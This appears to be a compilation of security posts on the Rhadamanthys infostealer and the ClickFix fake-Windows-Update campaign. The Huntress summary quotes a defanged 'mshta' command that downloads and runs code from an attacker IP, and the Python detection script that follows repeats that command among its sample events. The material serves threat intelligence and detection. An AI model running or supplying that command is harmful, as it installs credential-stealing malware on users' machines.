Watch out as new .NET AOT malware hides its code as a black box, making detection far harder while delivering Rhadamanthys infostealer and crypto miner.

Read: https://hackread.com/net-aot-malware-code-black-box-evade-detection/

#CyberSecurity #Rhadamanthys #InfoStealer #CryptoMiner

New .NET AOT Malware Hides Code as a Black Box to Evade Detection

Researchers at Howler Cell have discovered a new .NET AOT malware campaign that uses a clever scoring system to bypass security tools and steal your data.

Hackread - Cybersecurity News, Data Breaches, AI and More

Join me next week at the @SANSInstitute #CTISummit in Arlington, VA where I'll be presenting on an operation against the infostealer #Rhadamanthys from early in its development.

Register @ https://www.sans.org/u/1CtB

Come see me talk at the @SANSInstitute #CTISummit in Arlington, VA about the infostealer #Rhadamanthys during its early development.

https://www.sans.org/u/1CtB

I'm speaking at the @SANSInstitute #CTISummit on an operation against #Rhadamanthys years before #OperationEndgame.

https://www.sans.org/u/1CtB

Oldies are still goodies: It didn't take me long to find a #trojanized pirated TV show #Torrent on a public torrent search engine.

Tell your friends: This is why it's sometimes dangerous to pirate stuff.

The torrent delivers a rar that contains a #Rhadamanthys #infostealer #malware DLL. The package also contains a benign executable that uses the familiar VLC Player traffic-cone icon. It looks like a TV show file, but it's way too small at only 970kb. Double-clicking the benign executable loads the malware DLL.

Rhadamanthys is the same malware family that Europol put out a press release about last month. Maybe it was down for a while, but it seems it's not out -- yet.

The bogus torrent leverages strong interest in the streaming TV show Pluribus as its lure.

https://www.europol.europa.eu/media-press/newsroom/news/end-of-game-for-cybercrime-infrastructure-1025-servers-taken-down

https://www.virustotal.com/gui/file/a11f4f6270b44992837a3f3869397c00fc19176c673abd15edbda39e45227fd5/details

VirusTotal

🎯 Threat Intelligence
===================

Opening: Huntress documents a multi‑stage ClickFix social engineering campaign that culminates in infostealing malware delivery. The campaign evolves from simple "Human Verification" lures to more convincing fake Windows Update full‑screen prompts that instruct victims to paste and run a command via Win+R. Observed payloads include LummaC2 and Rhadamanthys.

Technical Details: The initial lure auto‑copies a command to the clipboard; a representative command observed was mshta hXXp://81.0x5a.29[.]64/ebc/rps.gz as recorded in the report. The lure page contains an encrypted JavaScript blob (ENC) and a KEY_HEX value; the script implements a small decryption pipeline (hexToKey -> b64ToUint8Array -> xorDecode -> uint8ToUtf8) to reconstruct second‑stage JavaScript. That second stage is injected via an in‑memory Blob URL and revoked after execution. Notably, the final loader does not simply append data to files: the malware encodes the final stages directly into PNG pixel data, leveraging specific color channels to reconstruct and decrypt the payload in memory.

Attack Chain Analysis:
• Initial Access: Social engineering via ClickFix pages disguised as human verification or Windows Update screens.
• Download: Initial fetch using mshta to retrieve compressed/encoded resources from remote hosts.
• Execution: Decrypted JavaScript is injected via Blob URLs and executed in the browser context.
• Loader: Steganographic PNGs deliver encrypted payloads embedded in pixel color channels; payloads are extracted and decrypted in memory.
• Payloads: Infostealers observed include LummaC2 and Rhadamanthys.

Detection: Observable indicators include clipboard manipulation following page visit, mshta fetches to unusual hosts, presence of encrypted ENC/KEY_HEX constructs in page source, Blob URL creation and rapid revocation, and PNG payloads with nonstandard pixel encodings. Huntress highlighted the dynamic loading of encrypted JavaScript as an evasion technique aimed at defeating string‑based detections.

Mitigation: The source report does not provide specific defensive playbooks. Defensive teams should prioritize telemetry that captures mshta network fetches, suspicious Blob URL script injections, and anomalous image decoding activities on endpoints and in browsers.

References and Context: Findings attributed to Huntress; campaign timeline begins in October with observed evolution from basic robot checks to sophisticated Windows Update impersonation.

🔹 #steganography #ClickFix #LummaC2 #Rhadamanthys #infostealer

🔗 Source: https://www.huntress.com/blog/clickfix-malware-buried-in-images

ClickFix Gets Creative: Malware Buried in Images | Huntress

Huntress uncovered an attack utilizing a ClickFix lure to initiate a multi-stage malware execution chain. This analysis reveals how threat actors use steganography to conceal infostealers like LummaC2 and Rhadamanthys within seemingly harmless PNGs.

Huntress
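The mshta command quoted in the write-up above writes the download host with a hexadecimal octet (81.0x5a.29[.]64), which legacy URL parsers accept but a detection rule matching only dotted-decimal IPs will miss. The following is an added example, not code from the Huntress report or the post: it runs over a constructed set of process-creation events (the log format, hostnames and all events other than the quoted indicator are assumptions), refangs report-style notation, flags mshta.exe launches that fetch a remote URL, and normalizes hex, octal and dword host encodings back to dotted decimal so the indicator can be compared against threat-intel lists.

```python
import re

# Constructed sample process-creation events (illustrative, not from the Huntress report).
# Format assumed here: "host | parent_image | image | command_line". The first event reuses
# the defanged indicator quoted in the write-up; the other events are made up.
SAMPLE_EVENTS = [
    "ws01 | explorer.exe | C:\\Windows\\System32\\mshta.exe | mshta hXXp://81.0x5a.29[.]64/ebc/rps.gz",
    "ws02 | chrome.exe | C:\\Windows\\System32\\mshta.exe | mshta https://203.0.113.10/update/check.hta",
    "ws03 | explorer.exe | C:\\Windows\\System32\\mshta.exe | mshta C:\\Tools\\local.hta",
    "ws04 | explorer.exe | C:\\Windows\\System32\\notepad.exe | notepad readme.txt",
    "ws05 | explorer.exe | C:\\Windows\\System32\\mshta.exe | mshta http://3232235777/x.hta",
]

# Captures the host part of an http(s) URL (stops at path, port, query or fragment).
URL_RE = re.compile(r"(?i)\bhttps?://([^/\s:?#]+)")


def refang(text: str) -> str:
    """Undo common report defanging (hXXp, [.]) so the URL regex can match."""
    text = re.sub(r"(?i)hxxps?://",
                  lambda m: m.group(0).lower().replace("hxxp", "http"), text)
    return text.replace("[.]", ".").replace("(.)", ".")


def _octet(tok: str) -> int:
    """Parse one address component the way legacy URL parsers do:
    0x.. is hex, a leading 0 means octal, anything else is decimal."""
    if tok[:2].lower() == "0x":
        return int(tok[2:], 16)
    if len(tok) > 1 and tok[0] == "0":
        return int(tok, 8)
    return int(tok, 10)


def normalize_host(host: str) -> str:
    """Return dotted-decimal form for hex/octal/dword-encoded IPv4 hosts;
    anything that is not a numeric address is returned lowercased."""
    parts = host.split(".")
    try:
        if len(parts) == 4:
            vals = [_octet(p) for p in parts]
            if all(0 <= v <= 255 for v in vals):
                return ".".join(str(v) for v in vals)
        elif len(parts) == 1:
            v = _octet(host)  # single 32-bit integer ("dword") form
            if 0 <= v <= 0xFFFFFFFF:
                return ".".join(str((v >> s) & 0xFF) for s in (24, 16, 8, 0))
    except ValueError:
        pass
    return host.lower()


def analyze(events):
    """Flag mshta.exe executions whose command line fetches a remote URL.
    Each finding records the raw host, its normalized form, and whether the
    two differ (i.e. the address was written in an obfuscated notation)."""
    findings = []
    for line in events:
        host, parent, image, cmdline = [f.strip() for f in line.split("|", 3)]
        if image.rsplit("\\", 1)[-1].lower() != "mshta.exe":
            continue
        match = URL_RE.search(refang(cmdline))
        if not match:
            continue  # local .hta files are out of scope for this rule
        raw = match.group(1)
        norm = normalize_host(raw)
        findings.append({
            "host": host,
            "parent": parent,
            "raw_host": raw,
            "normalized_host": norm,
            "obfuscated": norm != raw.lower(),
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        flag = " (obfuscated address)" if f["obfuscated"] else ""
        print(f"{f['host']}: mshta fetch from {f['raw_host']} -> {f['normalized_host']}{flag}")
```

The normalized host is what should be matched against blocklists or sinkhole data; the `obfuscated` flag is worth surfacing on its own, since a mixed-radix or dword address in a LOLBin command line has no legitimate reason to appear on a workstation.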

Fake Windows updates: how the ClickFix attack smuggles malware onto Windows PCs

A new ploy by cybercriminals highlights the danger of fake Windows updates. Under the name ClickFix, attackers lure Windows users with a deceptively realistic update animation displayed in a full-screen browser window. While the image gives the impression that a genuine system update is being installed, behind it lies hidden malicious code concealed in the pixels of an image.

More: https://maniabel.work/archiv/564

#clickfixphishing #WindowsUpdate #ClickFix #PNGstagnography #LummaC2 #Rhadamanthys #infosec #infosecnews #BeDiS

Fake Windows updates: how the ClickFix attack smuggles malware onto Windows PCs – maniabel.work

Discover what you yourself can do for the security and protection of your data.

Operation Endgame 3: 1025 servers taken off the network

International law enforcement has landed another blow against malware and the infrastructure behind it.

heise online